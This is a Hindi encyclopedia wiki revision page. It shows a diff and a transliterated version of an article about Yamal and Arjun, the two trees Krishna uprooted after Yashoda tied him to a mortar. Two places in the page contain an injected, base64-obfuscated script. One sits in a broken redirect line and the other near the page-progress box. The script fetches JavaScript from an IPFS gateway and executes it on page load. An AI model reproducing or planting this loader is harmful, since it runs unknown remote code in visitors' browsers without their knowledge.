Difference between revisions of "यमल और अर्जुन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''यमल और अर्जुन''' वे दो वृक्ष थे, जिन्हें भगवान [[श्रीक...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
'''यमल और अर्जुन''' वे दो वृक्ष थे, जिन्हें भगवान [[श्रीकृष्ण]] ने अपनी बाल लीलाओं के अंतर्गत धराशायी कर दिया था।
 
'''यमल और अर्जुन''' वे दो वृक्ष थे, जिन्हें भगवान [[श्रीकृष्ण]] ने अपनी बाल लीलाओं के अंतर्गत धराशायी कर दिया था।
  
*'यमलार्जुन' अर्थात 'यमल और अर्जुन', अपने पूर्व जन्म में 'नलकूबर' और 'मणिग्रीव' नामक [[कुबेर]] के दो पुत्र थे।
+
*'यमलार्जुन' अर्थात 'यमल और अर्जुन', अपने पूर्व जन्म में 'नलकूबर' और 'मणिग्रीव' नामक यक्ष थे, जो धन के [[देवता]] [[कुबेर]] के पुत्र थे।
*कुबेर के ये दोनों पुत्र [[नारद]] के शाप से वृक्ष हो गए थे।
+
*एक बार ये दोनों मद्य पीकर नग्न अवस्था में नदी में स्त्रियों के साथ क्रीड़ा कर रहे थे। जब वहाँ से [[नारद|नारदजी]] गुजरे तो स्त्रियों ने लज्जा से अपने तन ढक लिए, किंतु ये दोनों नग्न ही रहे।
*श्रीकृष्ण अपने बड़े भाई संकर्षण ([[बलदेव]]) के साथ खेलते-कूदते बड़े हुए थे। वे सात वर्ष की अवस्था में गोचारण के लिए जाया करते थे। एक बार मक्खन चुराकर खाने के दंडस्वरूप [[यशोदा|माँ यशोदा]] ने उन्हें ऊखल में बाँध दिया। कृष्ण ने उस ऊखल को यमल तथा अर्जुन नामक दो वृक्षों के बीच में फंसाकर इतने ज़ोर से खींचा कि वे दोनों वृक्ष भूमिसात हो गये। इस प्रकार उन वृक्षों पर रहने वाले दो [[राक्षस|राक्षसों]] का भी उन्होंने वध किया।
+
*कुबेर के इन दोनों पुत्रों को नारद ने शाप दिया कि वे दोनों वृक्ष बन जायेंगे।
 +
*[[श्रीकृष्ण]] अपने बड़े भाई संकर्षण ([[बलदेव]]) के साथ खेलते-कूदते बड़े हुए थे। वे सात वर्ष की अवस्था में गोचारण के लिए जाया करते थे। एक बार मक्खन चुराकर खाने के दंडस्वरूप [[यशोदा|माँ यशोदा]] ने उन्हें ऊखल में बाँध दिया। कृष्ण ने उस ऊखल को यमल तथा अर्जुन नामक दो वृक्षों के बीच में फंसाकर इतने ज़ोर से खींचा कि वे दोनों वृक्ष भूमिसात हो गये। इस प्रकार उन वृक्षों पर रहने वाले दो [[राक्षस|राक्षसों]] का भी उन्होंने वध किया।
 +
 
 +
 
 +
{{seealso|यमलार्जुन मोक्ष}}
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 9: Line 13:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{कृष्ण2}}
+
{{कृष्ण2}}{{कथा}}
 
[[Category:पौराणिक कोश]][[Category:कृष्ण]][[Category:कृष्ण काल]]
 
[[Category:पौराणिक कोश]][[Category:कृष्ण]][[Category:कृष्ण काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:13, 1 April 2014

yamal aur arjun ve do vriksh the, jinhean bhagavan shrikrishna ne apani bal lilaoan ke aantargat dharashayi kar diya tha.

  • 'yamalarjun' arthat 'yamal aur arjun', apane poorv janm mean 'nalakoobar' aur 'manigriv' namak yaksh the, jo dhan ke devata kuber ke putr the.
  • ek bar ye donoan mady pikar nagn avastha mean nadi mean striyoan ke sath kri da kar rahe the. jab vahaan se naradaji gujare to striyoan ne lajja se apane tan dhak lie, kiantu ye donoan nagn hi rahe.
  • kuber ke in donoan putroan ko narad ne shap diya ki ve donoan vriksh ban jayeange.
  • shrikrishna apane b de bhaee sankarshan (baladev) ke sath khelate-koodate b de hue the. ve sat varsh ki avastha mean gocharan ke lie jaya karate the. ek bar makkhan churakar khane ke dandasvaroop maan yashoda ne unhean ookhal mean baandh diya. krishna ne us ookhal ko yamal tatha arjun namak do vrikshoan ke bich mean phansakar itane zor se khiancha ki ve donoan vriksh bhoomisat ho gaye. is prakar un vrikshoan par rahane vale do rakshasoan ka bhi unhoanne vadh kiya.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh